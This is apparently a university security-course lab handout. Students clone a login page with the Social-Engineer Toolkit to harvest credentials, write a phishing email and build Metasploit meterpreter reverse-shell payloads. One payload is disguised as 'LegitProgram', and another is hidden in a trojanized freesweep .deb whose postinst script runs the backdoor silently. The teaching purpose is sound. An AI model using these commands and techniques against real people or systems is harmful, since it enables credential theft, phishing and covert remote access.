Lab 8 - Social Engineering
In this lab you are going to perform social engineering activities using the Social-Engineer Toolkit (SET).
"The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly." - https://github.com/trustedsec/social-engineer-toolkit
Note: A key selling point of many SET features is that you can get an attack for testing and demonstration purposes very quickly. Are they believable? Well..... Let's just say additional effort is required to go from script kiddie level to an attack with a real chance of success, and that would be accomplished by other tools (and custom tools), not by using the SET software.
So, with the understanding that SET is more for "fun demos", let's go!
Part 1 - Credential Harvesting via Site Cloner
Run the Social-Engineer Toolkit
$ sudo setoolkit
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX XX XX MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM XX XX MMMMMMMMMMMMMMMMMMMMMssssssssssssssssssssssssssMMMMMMMMMMMMMMMMMMMMM XX XX MMMMMMMMMMMMMMMMss''' '''ssMMMMMMMMMMMMMMMM XX XX MMMMMMMMMMMMyy'' ''yyMMMMMMMMMMMM XX XX MMMMMMMMyy'' ''yyMMMMMMMM XX XX MMMMMy'' ''yMMMMM XX XX MMMy' 'yMMM XX XX Mh' 'hM XX XX - - XX XX XX XX :: :: XX XX MMhh. ..hhhhhh.. ..hhhhhh.. .hhMM XX XX MMMMMh ..hhMMMMMMMMMMhh. .hhMMMMMMMMMMhh.. hMMMMM XX XX ---MMM .hMMMMdd:::dMMMMMMMhh.. ..hhMMMMMMMd:::ddMMMMh. MMM--- XX XX MMMMMM MMmm'' 'mmMMMMMMMMyy. .yyMMMMMMMMmm' ''mmMM MMMMMM XX XX ---mMM '' 'mmMMMMMMMM MMMMMMMMmm' '' MMm--- XX XX yyyym' . 'mMMMMm' 'mMMMMm' . 'myyyy XX XX mm'' .y' ..yyyyy.. '''' '''' ..yyyyy.. 'y. ''mm XX XX MN .sMMMMMMMMMss. . . .ssMMMMMMMMMs. NM XX XX N` MMMMMMMMMMMMMN M M NMMMMMMMMMMMMM `N XX XX + .sMNNNNNMMMMMN+ `N N` +NMMMMMNNNNNMs. + XX XX o+++ ++++Mo M M oM++++ +++o XX XX oo oo XX XX oM oo oo Mo XX XX oMMo M M oMMo XX XX +MMMM s s MMMM+ XX XX +MMMMM+ +++NNNN+ +NNNN+++ +MMMMM+ XX XX +MMMMMMM+ ++NNMMMMMMMMN+ +NMMMMMMMMNN++ +MMMMMMM+ XX XX MMMMMMMMMNN+++NNMMMMMMMMMMMMMMNNNNMMMMMMMMMMMMMMNN+++NNMMMMMMMMM XX XX yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy XX XX m yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy m XX XX MMm yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy mMM XX XX MMMm .yyMMMMMMMMMMMMMMMM MMMMMMMMMM MMMMMMMMMMMMMMMMyy. mMMM XX XX MMMMd ''''hhhhh odddo obbbo hhhh'''' dMMMM XX XX MMMMMd 'hMMMMMMMMMMddddddMMMMMMMMMMh' dMMMMM XX XX MMMMMMd 'hMMMMMMMMMMMMMMMMMMMMMMh' dMMMMMM XX XX MMMMMMM- ''ddMMMMMMMMMMMMMMdd'' -MMMMMMM XX XX MMMMMMMM '::dddddddd::' MMMMMMMM XX XX MMMMMMMM- -MMMMMMMM XX XX MMMMMMMMM MMMMMMMMM XX XX MMMMMMMMMy yMMMMMMMMM XX XX MMMMMMMMMMy. .yMMMMMMMMMM XX XX MMMMMMMMMMMMy. .yMMMMMMMMMMMM XX XX MMMMMMMMMMMMMMy. .yMMMMMMMMMMMMMM XX XX MMMMMMMMMMMMMMMMs. .sMMMMMMMMMMMMMMMM XX XX MMMMMMMMMMMMMMMMMMss. .... .ssMMMMMMMMMMMMMMMMMM XX XX MMMMMMMMMMMMMMMMMMMMNo oNNNNo oNMMMMMMMMMMMMMMMMMMMM XX XX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .o88o. o8o . 888 `" `"' .o8 o888oo .oooo.o .ooooo. .ooooo. oooo .ooooo. .o888oo oooo ooo 888 d88( "8 d88' `88b d88' `"Y8 `888 d88' `88b 888 `88. .8' 888 `"Y88b. 888 888 888 888 888ooo888 888 `88..8' 888 o. )88b 888 888 888 .o8 888 888 .o 888 . `888' o888o 8""888P' `Y8bod8P' `Y8bod8P' o888o `Y8bod8P' "888" d8' .o...P' `XER0' [---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] Version: 8.0.3 Codename: 'Maverick' [---] Follow us on Twitter: @TrustedSec [---] [---] Follow me on Twitter: @HackingDave [---] [---] Homepage: https://www.trustedsec.com [---] Welcome to the Social-Engineer Toolkit (SET). The one stop shop for all of your SE needs. The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com It's easy to update using the PenTesters Framework! (PTF) Visit https://github.com/trustedsec/ptf to update all your tools! Select from the menu: 1) Social-Engineering Attacks 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set>
Select the desired mode of operation:
set> 1 # For "Social-Engineering Attacks" set> 2 # For "Website Attack Vectors" set:webattack> 3 # For "Credential Harvester Attack" set:webattack> 2 # For "Site Cloner"
The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.
Enter the IP address that you want the stolen credentials to be sent to. The default IP here is probably fine - it's the IP of your Kali box running SET.
Enter the website that you wish to clone
Launch the web browser in Kali and visit your cloned page at
Enter a fake username and password, and confirm that you see those credentials in the SET console.
Note that the cloned website redirects to the real Canvas login page after swiping the credentials.
The user just assumes they entered the wrong login, tries again, and is in Canvas. Will they be suspicious? How many times have you entered a wrong password?
- Upload the XML report that SET produces with all the stolen credentials. You'll need to stop the collection process via CTRL-C.
While this is a fun example, the out-of-the-box SET experience is not particularly convincing. There are a number of issues.
- Issue 1: Look at the URL of your cloned site:
http://aaa.bbb.ccc.ddd. Is that IP address suitable for a real social engineering attack out across the Internet? Try accessing it from your phone if you're unsure. Why doesn't it work? (See: Background reading)
- Issue 1 (continued): How might you solve the IP address issue in the previous question?
- Issue 2: Look at the URL of your cloned site again:
http://aaa.bbb.ccc.ddd. An ugly IP address. Even 25% of moms would notice that looks suspicious or unusual. How could you remedy this problem?
- Issue 3: Look at the URL of your cloned site again:
http://aaa.bbb.ccc.ddd. HTTP. That's not encrypted. Web browsers are increasingly assertive with labeling such pages as not secure with a variety of warning labels or icons. Maybe 15% of moms would notice that. How could you solve this problem? (And, even better, solve this problem for a cost of $0.00?)
Part 2 - Email Blast
Let's say we have the cloned credential harvesting site, and it's doing a credible job masquerading as a legitimate site (after addressing issues 1-3 above with reasonable solutions). How do we get victims (er, client employees who we have explicit written permission to test) to visit our site? Let's send them an email and bait them to click it.
The Social-Engineer Toolkit has a "Mass Mailer" module where it can send out emails of your own design. Actually using this module (or any other mass mailing program) effectively, however, is a challenge. What you would love to do is generate fake emails coming from
email@example.com, but you'll quickly run into the same kinds of technological filtering and restrictions used to inhibit spammers.
One such anti-spam technology is Sender Policy Framework (SPF).
- Describe SPF, in your own words. (1 paragraph)
- Using any number of available websites, generate a SPF rule for the domain
company.com, specifying that IP address
188.8.131.52is allowed to send email for this domain, and also that host
gmail.comis also allowed to send email for this domain. Note: There are other more-detailed SPF options. I don't care how you set them.
As an example, the SPF rule for
v=spf1 ip4:184.108.40.206/25 ip4:220.127.116.11 ip4:18.104.22.168 include:spf.protection.outlook.com ....(more hosts).... ~all
Another such anti-spam technology is DomainKeys Identified Mail (DKIM).
- Describe DKIM, in your own words. (1 paragraph)
Finally, Domain-based Message Authentication, Reporting, and Conformance (DMARC) is a third anti-spam technology closely related to the first two.
- Describe DMARC, in your own words. (1 paragraph)
Note that none of these systems are guarantees. The receiver of an email could choose to disregard these systems and deliver a fraudulent message anyway. Or, more likely, the receiver uses information from these systems as data points in a larger anti-spam system that examines the content of the message, the reputation of the server sending the email, the user history in flagging previous messages as spam, and proprietary trade secrets built on decades of experience, when deciding whether to deliver the message to a user inbox. Even new legitimate senders have significant challenges in reliably delivering emails to @gmail.com, @outlook.com, and other large mail services.
Because of these challenges, you'll often see phishing attacks coming from
firstname.lastname@example.org, as those are more likely to be delivered. Of course, if you have already have some access to the corporate network after earlier pen testing activities, you could send emails out using the legitimate corporate email server. But that's a chicken and egg problem - often times you're using social engineering attacks to gain initial access to the network.
- Using your own personal email, create a high quality phishing email that would plausibly induce a "typical university student" to click on a link and take some action. Send it to yourself to ensure it's correctly formatted. Then, save the email as a .eml or .html file and attach it here. In gmail, the "download message" feature under the ". . ." icon will do this. Other mail clients have an export or save-as feature.
Part 3 - Payloads via msfvenom
Metasploit includes a tool - msfvenom - that can package Metasploit exploits into stand-alone executables that a user can be tricked into running via a social engineering attack.
To see a list of all available payloads, do:
$ msfvenom --list payloads
It's a long list, and the same list of available payloads that Metasploit normally has available to run after an exploit. Just, this time no exploit is needed, since we're using social engineering to trick the user into running the payload.
To see a list of available output formats, CPU architectures, and platforms, do:
$ msfvenom --list formats $ msfvenom --list archs $ msfvenom --list platforms
Make an executable that is runnable on our Metasploitable2 VM, a Linux host. That would be the
.elf file type. (Windows would be
.exe). Pick a payload from the list that works on Linux, and ask msfvenom to package it for you and save it to
/tmp/LegitProgram. This payload is hardwired to connect back to the
LHOST IP address, which should be Kali's IP:
$ msfvenom --payload linux/x86/meterpreter_reverse_tcp \ --arch x86 \ --format elf \ --platform linux \ LHOST=aaa.bbb.ccc.ddd \ LPORT=5678 \ > /tmp/LegitProgram
Tip 1: For clarity, this long command was split into multiple lines with the Bash "line continuation" character
\. Keep that character in if you enter the multi-line command, or omit it if you enter the command as a single line.
Tip 2: Did your console fill up with "gibberish" when you ran this? Then you didn't correctly redirect the output (using
>) to the file
/tmp/LegitProgram, and thus
msfvenom output the executable file to standard output instead.
Change to the
/tmp directory, and start a simple webserver in Kali to host this "LegitProgram" binary. We're using this as a way to get the binary on the target machine since we're in control of both sides, but in reality this would be accomplished through some social engineering attack.
$ cd /tmp $ python2 -m SimpleHTTPServer 8888 # Built-in webserver in Python 2 # python3 -m http.server 8888 # Alternate command: Built-in webserver in Python 3
Over on your Metasploitable2 VM, download the file from the webserver running in the Kali VM:
$ wget aaa.bbb.ccc.dddd:8888/LegitProgram
Warning: If you have to re-run this wget command for any reason and leave the original file in place, the next file will be named LegitProgram.1, LegitiProgram.2, etc, as shown in the wget output. Either delete the older copy prior to running wget again, or make a note of what the most recent file name is.
At this point, you can
CTRL-C on the webserver, we don't need it any more.
$ sudo service postgresql start $ msfconsole
Use the generic payload handler that provides Metasploit features to exploits run outside of the framework. Configure it for the payload you just downloaded on the target VM, as it needs to know
- What payload is incoming
- What IP the payload is connecting to, and
- What port the payload is connecting to.
msf6> use exploit/multi/handler msf6> set PAYLOAD linux/x86/meterpreter_reverse_tcp msf6> set LHOST aaa.bbb.ccc.ddd msf6> set LPORT 5678 msf6> set ExitOnSession false
Run this service in the background as a job.
msf6> exploit -j
Now, over in the Metasploitable2 VM, run the payload.
$ chmod +x LegitProgram # Needs to be marked as executable $ ./LegitProgram
Back in Kali, you should see a notice that a new session was opened.
[*] Meterpreter session 1 opened (172.16.196.2:5678 -> 172.16.196.4:33423) at 2021-02-07 00:20:41 -0800 msf6> sessions --list msf6> sessions -i X # where X = number of Meterpreter session
- Submit a screenshot of your Kali msfconsole showing an active meterpreter session
- Submit a screenshot of your Kali meterpreter showing the output of "sysinfo"
- Submit a screenshot of your Metasploitable2 VM console showing the "LegitProgram" running.
In Kali, you can quit the Meterpreter session with the
quit command. In addition, you can view the listening handler with
jobs and then kill that listener with
kill # (where # is the job ID number)
Part 4 - Payload Obfuscation
Rather than coax the user into running a program that is exclusively a back door (which might make them suspicious), what if the backdoor is bundled with some legitimate program? Let's build an Linux installer package (.deb file) for the minesweeper game "freesweep", but include an extra surprise in the bundle.
Based off of this tutorial, but with bugfixes. :) https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/
First, on Kali, download the legitimate
.deb file from the package manager. Since we're going to run this on the OLD Metasploitable2 VM (32-bit), let's just grab the correct binary out of the Ubuntu archives. That way, the dynamic library dependencies will work out OK.
$ mkdir -p /tmp/working $ cd /tmp/working $ wget http://old-releases.ubuntu.com/ubuntu/pool/universe/f/freesweep/freesweep_0.88-4.3_i386.deb
Second, extract the files into that working directory
$ dpkg -x freesweep_0.88-4.3_i386.deb package
Third, add a DEBIAN directory to contain the "extra surprise" we are included in this package
$ mkdir /tmp/working/package/DEBIAN
In the DEBIAN directory, create a new file called
control with the following contents:
$ nano /tmp/working/package/DEBIAN/control
Package: freesweep Version: 0.88-4.3 Section: Games and Amusement Priority: optional Architecture: i386 Maintainer: Ubuntu MOTU Developers (email@example.com) Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use.
In the DEBIAN directory, create a post-installation script called
postinst with the following commands that
- Change the permissions of the innocently-named "freesweep_scores" to include the execute flag
- Run the innocently-named "freesweep_scores", and
- Run the legitimate freesweep program
#!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep
Make this script executable
$ chmod +x /tmp/working/package/DEBIAN/postinst
Now, generate our backdoor program "freesweep_scores":
$ msfvenom --payload linux/x86/meterpreter_reverse_tcp \ --arch x86 \ --format elf \ --platform linux \ LHOST=aaa.bbb.ccc.ddd \ LPORT=5678 \ --out /tmp/working/package/usr/games/freesweep_scores
Finally, build the new
.deb file with the backdoor program:
$ cd /tmp/working/package/DEBIAN $ dpkg-deb -Zgzip --build /tmp/working/package # -Zgzip is needed because Metasploitable2 OS is much older than Kali's, and # package manager doesn't know how to uncompress newer .deb files
Rename the output back into the original
freesweep.deb file name (no one suspects a thing!), and move it to
$ mv /tmp/working/package.deb /tmp/freesweep.deb $ cd /tmp
As you did in the previous section: Run the web server and copy the new
freesweep.deb to your Metasploitable2 VM with wget.
Warning: If you have to re-run this wget command for any reason and leave the original file in place, the next file will be named freesweep.deb.1, freesweep.deb.2, etc, as shown in the wget output. Either delete the older copy prior to running wget again, or make a note of what the most recent file name is.
As you did in the previous section: Run Metasploit and launch the exploit/multi/handler with the correct options to listen for an incoming connection. Or, if msfconsole is still active, the hander may be still running.
On the Metasploitable2 VM, install this super fun game your friend sent you!
$ sudo dpkg -i freesweep.deb # Oh look, the game started automatically! # Let's play, this looks fun!
On Kali, view the active sessions
msf6> sessions --list msf6> sessions -i x meterpreter> sysinfo
Did something go wrong in your steps? To clear out metasploitable2 and start again:
$ sudo apt-get remove freesweep $ rm freesweep.deb # And download a fixed .deb file and try installing it again
You can verify that your copy of
freesweep.deb contains your backdoor program with
dpkg -c freesweep.deb.
- Submit a screenshot of Metasploitable2 showing the game running
- Submit a screenshot of Kali showing the active meterpreter session
- What is the md5 checksum of the original freesweep
.debfile downloaded from the repository? Use the
- What is the md5 checksum of the modified
freesweep.debfile that also includes the backdoor program "freesweep_scores"? Use the